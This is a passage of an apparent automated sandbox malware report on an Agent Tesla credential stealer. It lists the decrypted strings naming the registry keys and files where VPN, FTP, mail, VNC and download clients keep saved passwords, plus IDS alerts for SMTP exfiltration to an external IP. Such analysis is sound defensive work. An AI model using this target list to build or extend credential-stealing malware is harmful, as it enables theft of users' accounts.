                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: APPDATA
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Psi+\profiles
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \accounts.xml
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \accounts.xml
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: OpenVPN
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Software\OpenVPN-GUI\configs\
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: username
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: auth-data
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: entropy
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: USERPROFILE
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \OpenVPN\config\
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: remote
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: remote
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: NordVPN
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: NordVPN
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: NordVpn.exe*
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: user.config
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: //setting[@name='Username']/value
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: //setting[@name='Password']/value
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: NordVPN
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Private Internet Access
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: %ProgramW6432%
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Private Internet Access\data
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Private Internet Access\data
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \account.json
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: .*"username":"(.*?)"
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: .*"password":"(.*?)"
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Private Internet Access
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: privateinternetaccess.com
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: FileZilla
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: APPDATA
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: APPDATA
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <Server>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <Host>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <Host>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: </Host>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <Port>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: </Port>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <User>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <User>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: </User>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: </Pass>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <Pass>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: </Pass>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: CoreFTP
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: User
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Host
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Port
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: hdfzpysvpzimorhk
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: WinSCP
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: HostName
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: UserName
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Password
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: PublicKeyFile
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: PortNumber
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: WinSCP
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ABCDEF
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Flash FXP
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: port
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: user
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: pass
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: quick.dat
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Sites.dat
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \FlashFXP\
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \FlashFXP\
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: FTP Navigator
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: SystemDrive
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \FTP Navigator\Ftplist.txt
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Server
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Password
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: No Password
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: User
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: SmartFTP
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: APPDATA
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: WS_FTP
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: appdata
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: HOST
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: PWD=
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: PWD=
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: FtpCommander
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: SystemDrive
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: SystemDrive
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: SystemDrive
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \cftp\Ftplist.txt
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ;Password=
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ;User=
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ;Server=
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ;Port=
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ;Port=
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ;Password=
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ;User=
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ;Anonymous=
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: FTPGetter
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \FTPGetter\servers.xml
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <server>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <server_ip>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <server_ip>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: </server_ip>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <server_port>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: </server_port>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <server_user_name>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <server_user_name>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: </server_user_name>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <server_user_password>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: <server_user_password>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: </server_user_password>
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: FTPGetter
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: The Bat!
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: appdata
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \The Bat!
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Account.CFN
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Account.CFN
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Becky!
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: DataDir
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Folder.lst
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Mailbox.ini
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Account
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: PassWd
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Account
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: SMTPServer
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Account
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: MailAddress
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Becky!
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Outlook
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Email
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: IMAP Password
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: POP3 Password
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: HTTP Password
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: SMTP Password
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Email
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Email
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Email
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: IMAP Password
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: POP3 Password
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: HTTP Password
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: SMTP Password
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Server
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Windows Mail App
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Email
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Server
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: SchemaId
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: pResourceElement
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: pIdentityElement
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: pPackageSid
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: pAuthenticatorElement
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: syncpassword
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: mailoutgoing
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: FoxMail
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Executable
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: FoxmailPath
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Storage\
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Storage\
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \mail
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \mail
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Accounts\Account.rec0
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Accounts\Account.rec0
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Account.stg
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Account.stg
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: POP3Host
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: SMTPHost
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: IncomingServer
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Account
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: MailAddress
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Password
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: POP3Password
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Opera Mail
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: opera:
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: PocoMail
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: appdata
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Pocomail\accounts.ini
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Email
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: POPPass
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: SMTPPass
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: SMTP
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: eM Client
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: eM Client\accounts.dat
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: eM Client
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Accounts
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: "Username":"
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: "Secret":"
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: "ProviderName":"
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: o6806642kbM7c5
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Mailbird
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: SenderIdentities
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Accounts
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \Mailbird\Store\Store.db
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Server_Host
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Accounts
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Email
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Username
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: EncryptedPassword
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Mailbird
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: RealVNC 4.x
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Password
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: RealVNC 3.x
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: SOFTWARE\RealVNC\vncserver
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Password
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: RealVNC 4.x
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: SOFTWARE\RealVNC\WinVNC4
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Password
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: RealVNC 3.x
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Software\ORL\WinVNC3
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Password
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: TightVNC
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Password
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: TightVNC
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: PasswordViewOnly
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: TightVNC ControlPassword
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ControlPassword
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: TigerVNC
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Software\TigerVNC\Server
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Password
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: UltraVNC
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: passwd
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: UltraVNC
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: passwd2
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: UltraVNC
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ProgramFiles
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: passwd
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: UltraVNC
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ProgramFiles
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: passwd2
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: UltraVNC
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ProgramFiles
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: passwd
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: UltraVNC
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ProgramFiles
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: passwd2
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: UltraVNC
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: passwd
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: UltraVNC
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: passwd2
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: JDownloader 2.0
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: JDownloader 2.0\cfg
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: JDownloader 2.0\cfg
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Paltalk
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
                        Source: 0.2.LPO-2024-357.exe.3d0a078.1.unpackString decryptor: nickname
                        Source: LPO-2024-357.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: LPO-2024-357.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: htrC.pdb source: LPO-2024-357.exe
                        Source: Binary string: htrC.pdbSHA256V<2 source: LPO-2024-357.exe

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.4:49734 -> 199.79.62.115:587
                        Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49734 -> 199.79.62.115:587
                        Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:49734 -> 199.79.62.115:587
